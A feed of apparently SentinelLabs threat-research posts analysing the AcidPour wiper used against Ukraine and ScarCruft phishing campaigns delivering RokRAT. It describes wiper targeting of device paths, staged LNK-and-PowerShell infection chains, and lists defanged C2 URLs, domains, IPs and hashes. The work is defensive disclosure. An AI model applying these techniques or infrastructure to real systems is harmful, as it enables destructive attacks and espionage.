Normal view

There are new articles available, click to refresh the page.
Before yesterdaySentinelLabs

AcidPour | New Embedded Wiper Variant of AcidRain Appears in Ukraine

Executive Summary

  • SentinelLabs has discovered a novel malware variant of AcidRain, a wiper that rendered Eutelsat KA-SAT modems inoperative in Ukraine and caused additional disruptions throughout Europe at the onset of the Russian invasion.
  • The new malware, which we call AcidPour, expands upon AcidRain’s capabilities and destructive potential to now include Linux Unsorted Block Image (UBI) and Device Mapper (DM) logic, better targeting RAID arrays and large storage devices.
  • Our analysis confirms the connection between AcidRain and AcidPour, effectively connecting it to threat clusters previously publicly attributed to Russian military intelligence. CERT-UA has also attributed this activity to a Sandworm subcluster.
  • Specific targets of AcidPour have yet to be conclusively verified; however, the discovery coincides with the enduring disruption of multiple Ukrainian telecommunication networks, reportedly offline since March 13th.
  • The ISP attacks are being publicly claimed by a GRU-operated hacktivist persona via Telegram.

On March 16th, 2024, we identified a suspicious Linux binary uploaded from Ukraine. Initial analysis showed surface similarities with the infamous AcidRain wiper used to disable KA-SAT modems across Europe at the start of the Russian invasion of Ukraine (commonly identified by the ‘Viasat hack’ misnomer). Since our initial finding, no similar samples or variants have been detected or publicly reported until now. This new sample is a confirmed variant we refer to as ‘AcidPour’, a wiper with similar and expanded capabilities.

This is a threat to watch. My concern is elevated because this variant is a more powerful AcidRain variant, covering more hardware and operating system types. https://t.co/h0s6pJGuzv

— Rob Joyce (@NSA_CSDirector) March 19, 2024

Our technical analysis suggests that AcidPour’s expanded capabilities would enable it to better disable embedded devices including networking, IoT, large storage (RAIDs), and possibly ICS devices running Linux x86 distributions.

Following our initial reporting on Twitter, CyberScoop reported a claim from the Ukrainian SSCIP attributing our findings to UAC-0165, clustered as a subgroup under the outdated ‘Sandworm’ threat actor construct. We reported our initial findings to partners on Saturday, followed by the public analysis thread on Twitter. Our analysis is ongoing.

AcidRain Context

On February 24th, 2022, a cyber attack rendered Eutelsat KA-SAT modems inoperable in Ukraine. Spillover from this attack rendered 5,800 Enercon wind turbines in Germany unable to communicate for remote monitoring or control and reportedly affected vital services across Europe.

On March 30th, 2022, we identified a wiper component which we dubbed ‘AcidRain’ as a part of the attack chain that caused this disruption by rendering Surfbeam2 modems inoperable in an attempt to disable vital Ukrainian military communications at the start of the Russian invasion.

During our original analysis of AcidRain, we assessed with medium-confidence that there are developmental similarities between AcidRain and a VPNFilter stage 3 destructive plugin named ‘dstr’. In 2018, the FBI and Department of Justice attributed the VPNFilter campaign to the Russian government.

On May 10th, 2022, the European Union and its Member States issued an official condemnation of this activity, holding the Russian government responsible. Despite an abundance of wipers and cyber operations against Ukrainian targets in the subsequent months and years, we had not seen any further uses of AcidRain or similar components.

Enter AcidPour

On March 16th, 2024, we observed a new Linux wiper we are naming ‘AcidPour’. We alerted relevant partners immediately to stem the potential for any additional significant regional impact, followed by public dissemination of technical indicators and early analysis to alert the research community and encourage vigilance and contributions.

Our initial finding centered on surface similarities with AcidRain, so we placed a large emphasis on ascertaining whether a more conclusive relationship could be established between the two components at a technical level, as well as an understanding of its capabilities.

Technical Analysis

Where AcidRain is a Linux wiper compiled for MIPS architecture for compatibility with the devices targeted, AcidPour is compiled for x86 architecture. Despite both targeting Linux systems, the architecture mismatch somewhat limits our ability to compare the compiled codebases.

Notably, AcidRain was a hamfisted wiper rather than a specifically tailored solution. It operates by iterating over all possible devices in hardcoded paths, wiping each, before wiping essential directories. Its lack of specificity suggests a lack of familiarity (or time) to adapt to the specifics of the Surfbeam2 targets. However, that also means that AcidRain can serve as a more generic tool able to disable a wider swath of devices reliant on embedded Linux distributions.

MD5 1bde1e4ecc8a85cffef1cd4e5379aa44
SHA1 b5de486086eb2579097c141199d13b0838e7b631
SHA256 6a8824048417abe156a16455b8e29170f8347312894fde2aabe644c4995d7728
Size 17,388 bytes
Type ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Filename ‘tmphluyl8zn’
First Submitted 2024-03-16 14:42:53 UTC, Ukraine

The AcidPour variant is an ELF binary compiled for x86 (not MIPS), and while it refers to similar devices, the codebase has been modified and expanded to include additional capabilities. Our best automated attempts to compare across different architectures only yields a low confidence < 30% similarity.

BinDiff output comparing AcidRain (MIPS) and AcidPour (x86)
BinDiff output comparing AcidRain (MIPS) and AcidPour (x86)

We took that as a base measurement and proceeded to conduct a deep-dive analysis of the new binary with a focus on testing the hypothesis that the two are related variants, as well as detailing any net new capabilities.

Notable similarities include the use of the same reboot mechanism, the exact logic of the recursive directory wiping, and most importantly the use of the same IOCTL-based wiping mechanism used by both AcidRain and the VPNFilter plugin ‘dstr’.

Shared Reboot Mechanism

Recursive Directory Processing

Wiping Mechanisms

At the time of discovery, we noted the similarities between AcidRain’s IOCTLs-based device-wiping mechanism and the VPNFilter plugin ‘dstr’, pictured below:

AcidPour relies on the same device wiping mechanism:

AcidPour’s IOCTL-based wiping mechanism
AcidPour’s IOCTL-based wiping mechanism

AcidPour’s Net New Functionality

AcidPour expands upon AcidRain’s targeted linux devices to include Unsorted Block Image (UBI) and Device Mapper (DM) logic.

AcidRain’s supported devices:

/dev/sd* A generic block device
/dev/mtdblock* Flash memory (common in routers and IoT devices)
/dev/block/mtdblock* Another potential way of accessing flash memory
/dev/mtd* The device file for flash memory that supports fileops
/dev/mmcblk* For SD/MMC cards
/dev/block/mmcblk* Another potential way of accessing SD/MMC cards
/dev/loop* Virtual block devices

AcidRain targeted flash chips via MTD for raw access to flash memory in the form of /dev/mtdXX device paths. This capability is expanded in AcidPour to include /dev/ubiXX paths. UBI is an interface built on top of MTD to act as a wear-leveling and volume management system for flash memory. These devices are common in embedded systems dependent on flash memory like handhelds, IoT, networking, or in some cases ICS devices.

Block string array of device paths
Block string array of device paths

AcidPour also adds logic for handling /dev/dm-XX paths to access mapped devices. The device mapper framework enables logical volume management (LVM), abstracts physical storage into logical volumes for easier resizing, manipulation, and maintenance.

These devices act as virtual layers of block devices, enabling features like logical volumes, software RAID, and disk encryption. This would put devices like Storage Area Networks (SANs), Network Attached Storage (NASes), and dedicated RAID arrays in scope for AcidPour’s effects.

All Local, No imports

One of the most interesting aspects of AcidPour is its coding style, reminiscent of the pragmatic CaddyWiper broadly utilized against Ukrainian targets alongside notable malware like Industroyer 2.

AcidPour is programmed in C without relying on statically-compiled libraries or imports. Most functionality is implemented via direct syscalls, many called through the use of inline assembly and opcodes.

Example of a direct syscall implementation
Example of a direct syscall implementation

This forces some unusual seemingly-archaic approaches to simple operations like storing and modifying format strings for device paths as needed in the course of their operations.

Self-Delete

Perhaps as a response to the discovery of AcidRain, this new version now kicks off with a self-delete function. It maps the original file into memory, then overwrites it with a sequence of bytes ranging from 0-255 followed by a polite Ok.

AcidPour overwrites itself on disk at the beginning of its execution
AcidPour overwrites itself on disk at the beginning of its execution

Alternate Device Wiping Mechanism

At the time of our discovery of AcidRain, there was some confusion about the involvement of a wiper in taking down the Surfbeam2 modems. As we reverse engineered the malware, we found a second wiping mechanism that didn’t rely on IOCTLs. This alternate mechanism filled a buffer with the highest byte value (0xFFFFFFFF) and proceeded to decrement by 1, overwriting its target with the result. That allowed us to connect AcidRain’s expected output with dumps of the affected devices.

Viasat incident
I managed to dump the flash of two Surfbeam2 modems: 'attacked1.bin' belongs to a targeted modem during the attack, 'fw_fixed.bin' is a clean one.
A destructive attack. pic.twitter.com/0QuTrLFR2A

— reversemode (@reversemode) March 31, 2022

With this crucial detail in mind, we were curious as to whether AcidPour implements an analogous alternate wiping mechanism.

Depending on the device type, a different wiping mechanism is engaged, overwriting the device repeatedly with the contents of a 256kb buffer. The specifics of this alternate mechanism require further analysis.

Attribution

Earlier this week, CERT-UA confirmed our findings and publicly attributed the activity to UAC-0165, considered a subgroup of the outdated Sandworm APT. UAC-0165 targets are commonly observed in Ukrainian critical infrastructure, including telecommunications, energy, and government services.

In September 2023, Ukraine SSSCIP publicly released a report on their latest findings of Russian linked threat activity. Notably, their section on UAC-0165 points to the continued use of GRU-linked, fake hacktivist personas as a medium for publicly announcing major intrusions and the leak of stolen data from Ukrainian victims.

On March 13th, the SolntsepekZ persona publicly claimed the intrusion into Ukrainian telecommunication organizations, three days prior to our discovery of AcidPour.

In addition to their Telegram presence, SolntsepekZ makes use of multiple domains under this persona. On Telegram, visitors are currently linked to solntsepek[.]com, which is associated with the hosting IP 185.61.137.155, of BlazingFast Hosting in Kiev. This hosting IP has previously hosted solntsepek[.]info as well as being related to solntsepek[.]org and similar to solntsepek[.]ru.

Review of the current state of these alleged target organizations indicates the impact is still ongoing. Below is an example notice currently on display from Triangulum, a group of companies providing telephone and Internet services under the Triacom brand, and Misto TV. Industry colleagues with Kentik are also observing this activity and have shared observations of the impact starting on March 13th as well.

Triacom (Translated)
Triacom (Translated)

Misto-TV (Translated)
Misto-TV (Translated)

At this time, we cannot confirm that AcidPour was used to disrupt these ISPs. The longevity of the disruption suggests a more complex attack than a simple DDoS or nuisance disruption. AcidPour, uploaded 3 days after this disruption started, would fit the bill for the requisite toolkit. If that’s the case, it could serve as another link between this hacktivist persona and specific GRU operations.

Conclusion

The discovery of AcidPour in-the-wild serves as a stark reminder that cyber support for this hot conflict continues to evolve two years after AcidRain. The threat actors involved are adept at orchestrating wide-ranging disruptions and have demonstrated their unwavering intent to do so by a variety of means.

The transition from AcidRain to AcidPour, with its expanded capabilities, underscores the strategic intent to inflict significant operational impact. This progression reveals not only a refinement in the technical capabilities of these threat actors but also their calculated approach to select targets that maximize follow-on effects, disrupting critical infrastructure and communications.

We continue to monitor these activities and hope the broader research community will continue to support this tracking with additional telemetry and analysis.

ScarCruft | Attackers Gather Strategic Intelligence and Target Cybersecurity Professionals

Executive Summary

  • SentinelLabs observed a campaign by ScarCruft, a suspected North Korean APT group, targeting media organizations and high-profile experts in North Korean affairs.
  • We recovered malware in the planning and testing phases of Scarcruft’s development cycle, presumably intended for use in future campaigns.
  • ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals.
  • ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies.

Overview

In collaboration with NK News, SentinelLabs has been tracking campaigns targeting experts in North Korean affairs from South Korea’s academic sector and a news organization focused on North Korea. We observed persistent targeting of the same individuals over a span of two months. Based on the specific malware, delivery methods, and infrastructure, we assess with high confidence that the campaigns are orchestrated by ScarCruft. Also known as APT37 and InkySquid, ScarCruft is a suspected North Korean advanced persistent threat (APT) group with a long history of targeted attacks against individuals as well as public and private entities, primarily in South Korea.

In addition, we retrieved malware that we assess is currently in the planning and testing phases of ScarCruft’s development cycle and will likely be used in future campaigns. In an interesting twist, ScarCruft is testing malware infection chains that use a technical threat research report on Kimsuky as a decoy document. Kimsuky is another suspected North Korean threat group observed to share operational characteristics with ScarCruft, like infrastructure and C2 server configurations. Given ScarCruft’s practice of using decoy documents relevant to targeted individuals, we suspect that the planned campaigns will likely target consumers of technical threat intelligence reports, like threat researchers, cyber policy organizations, and other cybersecurity professionals.

We observed ScarCruft using oversized Windows Shortcut (LNK) files that initiate multi-stage infection chains delivering RokRAT, a custom-written backdoor associated with the threat group. RokRAT is a fully-featured backdoor equipped with capabilities that enable its operators to conduct effective surveillance on targeted entities. In an attempt to execute undetected, the infection chains involve multiple executable formats and evasion techniques. They continue an existing trend, closely resembling the infection chains seen in ScarCruft activities from earlier in 2023, including the campaigns disclosed by AhnLab in April 2023, Checkpoint in May 2023, and Qi An Xin in July 2023.

By targeting high-profile experts in North Korean affairs and news organizations focused on North Korea, ScarCruft continues to fulfill its primary objective of gathering strategic intelligence. This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea’s decision-making processes.

ScarCruft’s focus on consumers of technical threat intelligence reports suggests an intent to gain insights into non-public cyber threat intelligence and defense strategies. This helps in identifying potential threats to their operations and contributes to refining their operational and evasive approaches. As we continue to track suspected North Korean threat actors and their pace of experimentation, we assess they have a growing interest in mimicking cybersecurity professionals and businesses, ultimately for use in the targeting of specific customers and contacts directly, or more broadly through brand impersonation.

ScarCruft Campaigns

A phishing email, impersonating a member of the North Korea Research Institute (Institute for North Korean Studies  – INKS), was sent from the email address kirnchi122[@]hanmail.net on December 13, 2023, targeting an expert in North Korean affairs. The email contains an attached archive file named December 13th announcement.zip (machine translation from Korean), which includes nine files.

The files claim to be presentation materials from a fabricated event relevant to the targeted individual — an apparent human rights expert discussion meeting. To make the phishing email current and therefore more credible, the email asserts that the meeting occurred on the same date the email was sent (December 13).

ScarCruft Phishing email (in Korean)
Phishing email (in Korean)

Among the nine files, seven are benign Hangul Word Processor (HWP) and PowerPoint documents, while two are malicious LNK files. LNK files have become popular among threat actors for malware deployment since Microsoft’s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources.

In an attempt to make the malicious LNK files blend among the benign files, all files have names that relate to human rights in North Korea and start with a number assigned to each file. Furthermore, the LNK files disguise themselves as Hanword documents, using the Hangul Word Processor icon (the Icon location LNK artifact was set to C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe).

Filename Machine translation
1. 전영선 북한 주민 정보접근권 강화방안.hwp 1. Jeon Young-seon’s plan to strengthen North Korean residents’ right to access information.hwp
2.이상용 반동사상문화배격법과 정보 유입 활동의 변화.pptx 2. Lee Sang-yong’s reactionary ideology cultural rejection law and changes in information inflow activities.pptx
3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk 3. Lee Yun-sik’s North Korean Human Rights Act implementation plan centered on the launch of the North Korean Human Rights Foundation.lnk
5. 여현철 북한주민 정보접근권 강화 방안.hwp 5. Yeo Hyeon-cheol’s plan to strengthen North Korean residents’ right to access information.hwp
6. 이종겸 북한인권 토론회 토론문.hwp 6. Lee Jong-gyeom North Korean human rights debate discussion paper.hwp
7. 박유성 북한주민 정보접근 강화방안.hwp 7. Park Yoo-sung’s plan to strengthen North Korean residents’ access to information.hwp
8. 이도건 북한연구소 토론회.lnk 8. Lee Do-gun North Korean Research Center Discussion.lnk
9. 김태원 북한인권 전문가 토론회 토론문.hwp 9. Taewon Kim, North Korean human rights expert discussion paper.hwp
10. 서유석 북한 주민들의 알권리 제고 방안.hwp 10. Seo Yoo-seok’s plan to improve North Korean residents’ right to know.hwp

The LNK files exceed 48 MB and implement a multi-stage mechanism deploying the RokRAT backdoor.

ScarCruft Infection chain: 8. 이도건 북한연구소 토론회.lnk
Infection chain: 8. 이도건 북한연구소 토론회.lnk

The LNK files execute PowerShell code that performs the following actions:

  • Locates the executing LNK file based on its filesize.
  • Extracts from the LNK file a decoy document (in HWP and HWPX format), a Windows Batch script named 111223.bat, and a PowerShell script named public.dat, placing the script in the %Public% folder.
  • Displays the decoy document and executes 111223.bat.
  • Deletes the executing Shortcut file.

The PowerShell code locates the content of the files it extracts from the LNK file based on hardcoded offsets.

ScarCruft PowerShell code
PowerShell code

111223.bat then executes the PowerShell script stored in %Public%\public.dat. This script decodes and executes another hex-encoded PowerShell script embedded in public.dat.

The content of public.dat
The content of public.dat

The decoded script downloads from a major Cloud file hosting provider a file named myprofile[.]zip, XOR-decrypts the file using the first byte as an XOR key, and executes the decrypted content in a thread.

myprofile[.]zip implements a shellcode that deploys the RokRAT backdoor. RokRAT uses public Cloud services for command-and-control purposes, such as pCloud and Yandex Cloud, disguising malicious communication as legitimate network traffic.

ScarCruft PowerShell script executing shellcode
PowerShell script executing shellcode

While most of the documents we analyzed are stripped of metadata, a HWPX decoy document stands out by containing metadata that identifies the pseudonym bandi as the document’s creator. We note the use of the same string in the context of Kimsuky activities, for example, in an email address used in a phishing campaign (bandi00413[@]daum.net) and in a C2 server domain (one.bandi[.]tokyo).

While the overlap in pseudonym use does not represent a strong link between the groups from a technical perspective, it is still indicative of the suspected relations between them. In the context of North Korea, the term bandi is known as the pseudonym of a suspected North Korean author known for publishing dissident writing. bandi also means ‘firefly’ in Korean.

The bandi pseudonym (HWPX document metadata)
The bandi pseudonym (HWPX document metadata)

Earlier Overlapping Campaign

Some of the individuals targeted in the December 2023 ScarCruft activity, discussed above, were also targeted approximately one month earlier on November 16, 2023. This speaks of the adversary’s persistence and adaptability in pursuing its goals. The November campaign included individuals from a news organization focused on North Korea as well.

A phishing email, impersonating a member of the North Korea Research Institute, was sent from the address c039911[@]daum.net. The email attaches two malicious HWP files, titled 조선 시장 물가 분석(회령).hwp (Shipbuilding market price analysis (Hoeryeong).hwp) and 조선 시장 물가 분석(신의주).hwp (Shipbuilding market price analysis (Sinuiju).hwp, machine translation from Korean), disguised as North Korean market price analysis data.

Phishing email (in Korean)
Phishing email (in Korean)

The documents contain OLE objects, activated by double-clicking on the document’s content. In adherence to the HWP document format, the OLE objects are stored as compressed Structured Storage objects, and their decompression reveals C2 URLs accessed upon OLE object activation.

The HWP documents contain metadata, including the LinkValue, Last Saved By, and Author metadata values, which provide information on the system accounts where the documents have been created.

HWP document C2 URL and metadata
조선 시장 물가 분석(회령).hwp http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC
LinkValue: \Users\Moo\AppData\Local\Temp
Last Saved By: Moo
Author: Moo
조선 시장 물가 분석(신의주).hwp http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk_001
Author: dailynk01

The DailyN~1/dailynk_001/dailynk01 account is particularly interesting since it relates to Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea with which we have collaborated in the past. The focus of this organization makes them an attractive target for North Korean threat actors seeking to intrude or impersonate it, a strategy previously observed by SentinelLabs in past Kimsuky campaigns. It remains to be investigated whether this account is used for developing malware involved in Daily NK-related campaigns and/or serves as an additional indicator of the suspected relations between Kimsuky and ScarCruft. Additionally, in our previous reporting on the overlap of suspected North Korean intrusions into a Russian missile engineering organization, we shared links to ScarCruft infrastructure making use of this same illicit naming scheme, such as dallynk[.]com.

Pivoting on the DailyN~1 artifact revealed additional HWP documents that share overlapping metadata information and employ the same OLE-based infection vector, using different C2 URLs.

HWP document (SHA-1 hash) C2 URL and metadata
e9df1f28cfbc831b89a404816a0242ead5bb142c http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk01
Author: umgdnk-03
2f78abc001534e28eb208a73245ce5389c40ddbe http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU
LinkValue: \Users\DailyN~1\AppData\Local\Temp
Last Saved By: dailynk_001
Author: /

The app.documentoffice[.]club domain is also used as C2 endpoint for malicious Microsoft Office documents, employing ActiveX controls to establish communication with the C2 server.

Office document (SHA-1 hash) C2 URL
e46907cfaf96d2fde8da8a0281e4e16958a968ed http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950
39c97ca820f31e7903ccb190fee02035ffdb37b9 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE
577c3a0ac66ff71d9541d983e37530500cb9f2a5 http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6

At the time of analysis, the C2 URLs were inactive, preventing us from examining their functions and any potential additional payloads they might deliver to the targets. We are still investigating the role of the user and view query parameter values, such as 5JV0FAGA6KW1GBHB7LX2HCIC and H11I75PFF0ZG53NDG00H64OE.

While preparing this report, Genians released research that outlines ScarCruft campaigns throughout 2023, covering certain aspects of the activities discussed in this section. We add to the public information on this activity cluster by providing additional details on the related infrastructure.

Infrastructure associated with this cluster of suspected North Korean threat activity leads to multiple interesting details which we have found useful for further monitoring and analysis of separate campaigns. The domains offlinedocument[.]site and documentoffice[.]club both make use of a variety of subdomains such as open, nav, and app as previously mentioned. During their illicit use, the domains temporarily make use of Lithuania’s Cherry Servers virtual private server (VPS) hosting service – 84.32.131[.]87, and 84.32.131[.]104 in this case.

A repeating trend is the actor registering domains through Namecheap, leaving the domain parked on a Namecheap IP address, and then rotating to Cherry Servers. In separate domains, we observe this same operational workflow, and interestingly other domains which the actor only makes use of for one or two days before shifting back to a parked IP address. We assess this process aims to limit detection and analysis capabilities following their malicious activity, such as hosting a phishing login or malware delivery link.

Examples of this activity can be found through publicly available telemetry, such as that of instantreceive[.]org. This domain hosted a page mimicking GitHub, a characteristic not new to North Korea-attributed threat actors, as we have reported on in the past.

GitHub phishing page
GitHub phishing page

This domain overlaps through the use of unique Cherry Servers hosting IPs, which can be used for further moderate-confidence infrastructure pivoting. We encourage readers to conduct additional research and monitoring. The full list shown here is provided in the IOC table.

ScarCruft Cherry Servers overlap map
Cherry Servers overlap map

ScarCruft Testing Grounds

While investigating ScarCruft activities, we retrieved malware that we assess to be part of ScarCruft’s planning and testing processes. This includes a spectrum of shellcode variants delivering RokRAT, public tooling, and two oversized LNK files, named inteligence.lnk and news.lnk.

Although similar to those implemented by 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnk discussed above, the infection chains  executed by inteligence.lnk and news.lnk exhibit some differences. This has likely been done to evade detection based on the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

Infection chain: news.lnk
Infection chain: news.lnk

inteligence.lnk executes PowerShell code, which locates the executing LNK file based on its filename instead of its filesize. The code then extracts from the LNK file and displays a decoy PDF document (named inteligence.pdf), and downloads from a major Cloud file hosting provider a hex-encoded file named story.txt. The PowerShell code locates the content of the decoy document it extracts from the LNK file based on a byte pattern (50 4b 03 04) instead of a hardcoded file offset.

The PowerShell code then decodes the file, and executes the decoded file content in a thread. story.txt implements a benign shellcode that just opens notepad.exe, indicating that inteligence.lnk has been developed for testing purposes.

In contrast to 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnkinteligence.lnk does not execute a Windows Batch script and an external PowerShell script.

inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode
inteligence.lnk: Shellcode

news.lnk downloads, in the form of a file named story3.txt, and executes PowerShell code. The implementation and functionality of the code are very similar to that executed by inteligence.lnk, with a major difference being that the shellcode it executes is not downloaded from a remote endpoint but is embedded in the LNK file itself.

In contrast to inteligence.lnk, the shellcode executed by news.lnk is weaponized and deploys the RokRAT backdoor. It is likely that news.lnk is the fully developed version of inteligence.lnk, intended for use in future ScarCruft campaigns. As of the time of writing, we have not observed news.lnk or its variants in the wild.

Both LNK files deploy the same decoy document – a public research report on the Kimsuky threat group by Genians, a South Korean cybersecurity company. The report is written in Korean and was released in late October 2023.

ScarCruft Decoy document
Decoy document

Given the report’s technical content, the LNK file names, and ScarCruft’s use of decoys relevant to the targeted individuals, we suspect ScarCruft has been planning phishing or social engineering campaigns on recent developments in the North Korean cyber threat landscape, targeting audiences consuming threat intelligence reports.

Conclusions

The findings outlined in this post highlight ScarCruft’s ongoing dedication to gathering strategic intelligence through targeted attacks. Our insight into ScarCruft’s malware testing activities reveals the adversary’s commitment to innovating its arsenal and expanding its target list, likely intending to target and/or masquerade as cybersecurity professionals or businesses.

We observed the group experimenting with new infection chains inspired by those they have used in the past. This involves modifying malicious code implementations and excluding certain files from the infection steps, likely as a strategy to evade detection based on filesystem artifacts and the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

We suspect that ScarCruft is pursuing non-public cyber threat intelligence and defense strategies. This could benefit not only ScarCruft specifically but also the other constituent groups within the North Korean threat landscape, aiding them in identifying threats to their operations and improving their operational playbooks.

A heightened awareness and better understanding of the adversary’s attack and infection methods among potential targets are crucial for effective defense. SentinelLabs remains actively engaged in tracking ScarCruft activities and supporting the organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

Value Note
0ED884A3FC5C28CDB8562CD28993B30991681B0A intelligence.lnk
2F78ABC001534E28EB208A73245CE5389C40DDBE Malicious HWP document
39C97CA820F31E7903CCB190FEE02035FFDB37B9 Malicious Office document
4024A9B0C0F19A33A3C557C7E220B812EE6FDD17 8. 이도건 북한연구소 토론회.lnk
46C3F9DE79D85165E3749824804235ACA818BA09 9. 김태원 북한인권 전문가 토론회 토론문.hwp
483B84F973528B23E5C14BC95FBC7031A4B291F1 1. 전영선 북한 주민 정보접근권 강화방안.hwp
4C74E227190634A6125B2703B05CB16AD69AC051 2.이상용 반동사상문화배격법과 정보 유입 활동의 변화.pptx
577C3A0AC66FF71D9541D983E37530500CB9F2A5 Malicious Office document
7C4E37E0A733B5E8F0F723CCA2A9675901527DC4 Decoy document
88DB1E2EFBB888A97A530C8BEF8CA104CEAAB80C public.dat
8951F3EB2845C0060E2697B7F6B25ABE8ADE8737 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk
9DD8AA1D66CC4E765E63DC5121216D95E62A0E1C 10. 서유석 북한 주민들의 알권리 제고 방안.hwp
9E0C6A067AAB113E6A4B68299AB3B9D4C36FC330 news.lnk
9EAAAB9D4F65E3738BB31CDF71462E614FFBD2BA 6. 이종겸 북한인권 토론회 토론문.hwp
B23A3738B6174F62E4696080F2D8A5F258799CE5 조선 시장 물가 분석(회령).hwp
B91B318A9FBB153409A846BF173E9D1BD0CC4DBF 111223.bat
C4B58CA12F7B16B6D39CE4222A5A2E054CD77B4E 7. 박유성 북한주민 정보접근 강화방안.hwp
D457D6BDCFA6D31934FB1E277FA0DE7119E9C2A5 5. 여현철 북한주민 정보접근권 강화 방안.hwp
D9AC0CC6D7BDC24F52878D3D5AC07696940062D0 myprofile[.]zip
E46907CFAF96D2FDE8DA8A0281E4E16958A968ED Malicious Office document
E9DF1F28CFBC831B89A404816A0242EAD5BB142C Malicious HWP document
FBF4D8C7418B021305317A185B1B3534A2E25CC8 조선 시장 물가 분석(신의주).hwp

Domains

Value Note
app[.]documentoffice[.]club C2 domain (HWP and Office documents)
benefitinfo[.]live VPS overlap (moderate confidence)
benefitinfo[.]pro VPS overlap (moderate confidence)
benefiturl[.]pro VPS overlap (moderate confidence)
careagency[.]online VPS overlap (moderate confidence)
cra-receivenow[.]online VPS overlap (moderate confidence)
crareceive[.]site VPS overlap (moderate confidence)
depositurl[.]co VPS overlap (moderate confidence)
depositurl[.]lat VPS overlap (moderate confidence)
direct.traderfree[.]online VPS overlap (moderate confidence)
forex.traderfree[.]online VPS overlap (moderate confidence)
groceryrebate[.]online VPS overlap (moderate confidence)
groceryrebate[.]site VPS overlap (moderate confidence)
gstcreceive[.]online VPS overlap (moderate confidence)
instantreceive[.]org VPS overlap (moderate confidence)
nav[.]offlinedocument[.]site C2 domain (HWP documents)
receive[.]bio VPS overlap (moderate confidence)
receiveinstant[.]online VPS overlap (moderate confidence)
rentsubsidy[.]help VPS overlap (moderate confidence)
rentsubsidy[.]online VPS overlap (moderate confidence)
tinyurlinstant[.]co VPS overlap (moderate confidence)
urldepost[.]co VPS overlap (moderate confidence)
verifyca[.]online VPS overlap (moderate confidence)
visiononline[.]store VPS overlap (moderate confidence)

URLs

Value Note
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP C2 URL (HWP document)

IP Addresses

Value Note
84.32.129[.]32 Cherry Servers VPS
84.32.131[.]104 Cherry Servers VPS
84.32.131[.]30 Cherry Servers VPS
84.32.131[.]50 Cherry Servers VPS
84.32.131[.]59 Cherry Servers VPS
84.32.131[.]66 Cherry Servers VPS
84.32.131[.]87 Cherry Servers VPS

Email Addresses

Value Note
c039911[@]daum.net Phishing email address
kirnchi122[@]hanmail.net Phishing email address

Decoding the Past, Securing the Future | Enhancing Cyber Defense with Historical Threat Intelligence 

By: Tom Hegel
28 November 2023 at 14:28

Organizational defenders today face unprecedented pressure to keep up with a relentless stream of new attacks. No sooner than the latest campaign is discovered, indicators shared, and defenses bolstered, and we are on to the next one. The details of these attacks are added to our collective historical record, but most defenders rarely have time or motivation to reconsider what further value they might offer.

However, mining historical data for insight into tomorrow’s attacks is, we would argue, an undervalued resource. From expanding our list of known indicators and developing better threat intelligence to improving our understanding of attribution and providing new discoveries, investigating historical data is an asset that cyber defenders can and should make more of.

In this post, we explore practical ways that revisiting past cyber incidents can empower defenders and help to anticipate future threats more effectively.

1. Exploring the Past to Expand Actionable Threat Intelligence

In September of 2023, SentinelLabs observed a new threat activity cluster by a previously unknown threat actor we dubbed Sandman. The threat actor deploys malware utilizing the LuaJIT platform, a development paradigm relatively rarely seen in the cyberespionage domain,  but which has an historical association with suspected Western or Western-aligned advanced threat actors.

